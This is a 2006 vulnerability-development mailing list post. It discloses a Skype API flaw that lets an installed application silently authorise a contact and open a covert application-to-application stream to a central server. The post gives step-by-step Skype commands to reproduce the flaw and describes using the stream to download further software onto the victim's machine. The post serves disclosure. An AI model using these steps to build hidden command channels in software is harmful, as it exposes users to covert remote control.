Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Skype API Ap2Ap Stream Creation Flaw

From: vizig0thblitz () gmail com
Date: 18 Aug 2006 23:06:58 -0000
An application-to-application stream can be created between two Skype clients without having established normal 
communications between them and both Skype client's contact lists are empty.  With this ability any Skype enabled 
application can create a convert communication stream to a central server.  This can only occur, of course, if the user 
voluntarily installs the application.  Therefore, the main attack vector for this functionality is to create a 
legitimate Skype-enabled application, have the user install the application, and once the user starts the application 
make a covert connection to a central server.  Once the connection to the central server is made, additional software 
can be downloaded and installed on the target computer via the application-to-application stream.

Scenario Setup:

The following will be needed to recreate the scenario:

1.Two computers with Skype installed and two separate Skype Ids that have had no communication between them.

2.A copy of SkypeTracer installed on each computer.

Scenario Steps:

1.Start the Skype clients and SkypeTracer on each computer and attach the SkypeTracer application to their respective 
Skype clients.

2.Choose one of the Skype clients to be the central server and one to be the client that will establish the covert 
communication.

3.In the client SkypeTracer application send the following Skype command:

   SET USER [server Skype Id] IS AUTHORIZED TRUE

4.You will notice the chatter back and forth between the two clients adding each of the Skype Ids to their respective 
user1024.dbb files.  This is the only place that I have found where the central server Skype Id can be found on the 
client's computer.

5.In both SkypeTracer applications create a common application using the Skype command:

       CREATE APPLICATION test

6.Once the process in step three and four has been completed (it can take up to ten seconds) send the following Skype 
command on the client SkypeTracer application:

       GET APPLICATION test CONNECTABLE

7.The client SkypeTracer application should echo back the central server's Skype Id.

8.Once the connectable user has been verified you can then complete the steps to establish application-to-application 
communication using the Skype command

ALTER APPLICATION test CONNECT [server Skype Id]

on the client SkypeTracer application.

9.Both SkypeTracer application's should now echo back that the application streams have been created
Previous By Date Next
Previous By Thread Next

Current thread: